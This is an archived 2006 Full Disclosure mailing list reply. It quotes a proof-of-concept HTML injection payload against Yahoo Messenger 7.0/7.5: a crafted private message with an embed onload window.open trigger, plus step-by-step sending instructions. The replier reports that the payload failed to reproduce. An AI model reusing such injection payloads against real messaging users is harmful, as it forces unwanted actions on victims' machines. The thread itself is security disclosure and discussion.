Full Disclosure mailing list archives
Re: Yahoo messenger serious bug
From: "John Dietz" <www.whitewolf () gmail com>
Date: Fri, 28 Jul 2006 11:20:11 -0500
I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees: s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(. There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window? Cheers On 7/28/06, Ivan Ivan <ivancool2003 () yahoo com ar> wrote:
Hi, I found another vulnerability in yahoo messenger that if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (without quotes) Yahoo messenger open in this case google.com in the internet explorer of the remote victim. Yahoo messenger bug proof of concept: 1. Open messenger and log it. 2. Open a yahoo chat third party like yahelite through Ymsgr protocol and log it with another account. 3. Send a Pm to the messenger account with this string: s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( 4. The remote user will open www.google.com (you can change) Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( Tested in yahoo messenger 7.0/7.5 Regards. __________________________________________________ Preguntá. Respondé. Descubrí. Todo lo que querías saber, y lo que ni imaginabas, está en Yahoo! Respuestas (Beta). ¡Probalo ya! http://www.yahoo.com.ar/respuestas _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo messenger serious bug Ivan Ivan (Jul 28)
- Re: Yahoo messenger serious bug John Dietz (Jul 28)
- Re: Yahoo messenger serious bug evilrabbi (Jul 28)
- Re: Yahoo messenger serious bug Morning Wood (Jul 29)
- Re: Yahoo messenger serious bug John Dietz (Jul 28)